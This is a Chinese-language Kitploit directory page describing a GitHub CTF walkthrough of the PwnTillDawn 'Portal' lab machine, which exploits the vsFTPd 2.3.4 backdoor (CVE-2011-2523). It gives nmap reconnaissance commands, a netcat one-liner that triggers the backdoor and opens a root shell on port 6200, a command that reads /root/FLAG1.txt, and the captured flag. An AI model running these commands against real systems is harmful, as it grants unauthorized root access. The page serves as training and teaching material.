Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
PwnTillDawn-Portal-Walkthrough — 针对"Portal"机器的详细渗透测试演练与利用报告,重点围绕 CVE-2011-2523(vsFTPd 2.3.4 后门)实现 root 权限获取。 | Kitploit
工具/GitHubGitHub/tr00jan99/pwntilldawn-portal-walkthrough
权限提升侦察漏洞分析漏洞利用后渗透利用CTF渗透测试学习与教育
GitHub

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享
tr00jan99/pwntilldawn-portal-walkthrough

PwnTillDawn-Portal-Walkthrough

针对"Portal"机器的详细渗透测试演练与利用报告,重点围绕 CVE-2011-2523(vsFTPd 2.3.4 后门)实现 root 权限获取。

查看仓库
25个月前尚未审核

🔐 漏洞评估与渗透测试(VAPT)

📌 项目:目标利用演练

⚠️ 本项目仅供教育和授权测试目的使用。
严禁未经授权访问系统。


👨‍💻 作者

SYAFIQ
角色:首席渗透测试工程师


🎯 目标信息

  • 目标 IP: 10.150.150.12
  • 操作系统: Ubuntu Linux
  • 状态: 🔴 严重(检测到后门)
  • 漏洞: CVE-2011-2523(vsFTPd 后门)

🧭 攻击概览

阶段工具描述
发现Nmap扫描网络中的活跃主机
枚举Nmap识别服务及版本
分析NSE 脚本检测已知漏洞
利用Netcat触发后门
后渗透终端获取 root 权限并取回 flag

🚀 分步演练

🔍 第 1 步:网络侦察

扫描网络中的活跃主机:

root@kitploit:~
nmap -sn --unprivileged 10.150.150.10-30

✅ 结果:

-检测到 8 台主机 -目标已识别:10.150.150.12

🔎 第 2 步:服务枚举

扫描开放端口和服务:

root@kitploit:~
nmap -Pn -F --unprivileged -sV 10.150.150.12

✅ 发现:

-端口 21 → FTP(vsftpd) -端口 22 → SSH(OpenSSH 8.2p1)

⚠️ 第 3 步:漏洞扫描

检查已知的 FTP 后门漏洞:

root@kitploit:~
nmap -Pn --unprivileged -p21 --script ftp-vsftpd-backdoor 10.150.150.12

🚨 结果:

-目标存在漏洞 -CVE-2011-2523 漏洞已确认

💣 第 4 步:漏洞利用

使用恶意用户名触发后门:

root@kitploit:~
(echo "USER hello:)"; echo "PASS password"; sleep 1) | nc -nv 10.150.150.12 21

⚡ 这将在 6200 端口打开一个隐藏的 root shell

🔓 第 5 步:获取访问权限(Root Shell)

连接到后门并执行命令:

root@kitploit:~
(echo "id; cat /root/FLAG1.txt"; sleep 1) | nc -nv 10.150.150.12 6200

✅ 结果:

已获得 root 权限 已确认 uid=0(root)

🏁 Flag 已捕获:

root@kitploit:~
5ee499eb5d0b8e4269b13483e57adaa0b3815f48

🧠 关键要点

  • 始终更新过时的服务(vsFTPd 曾存在漏洞)
  • 配置不当的服务可能导致整个系统被攻陷
  • 简单的扫描即可发现严重漏洞 -🛡️ 安全建议 -🔄 将 FTP 服务更新至最新版本 -🚫 禁用不必要的服务 -🔐 使用防火墙限制访问 -📊 定期进行安全审计 -📚 免责声明

本项目仅供以下用途:

学习网络安全 道德黑客实践 授权渗透测试

❌ 请勿将此知识用于非法活动。

⭐ 结语

“安全不是产品,而是过程。” —— 始终测试、监控并改进。

下载工具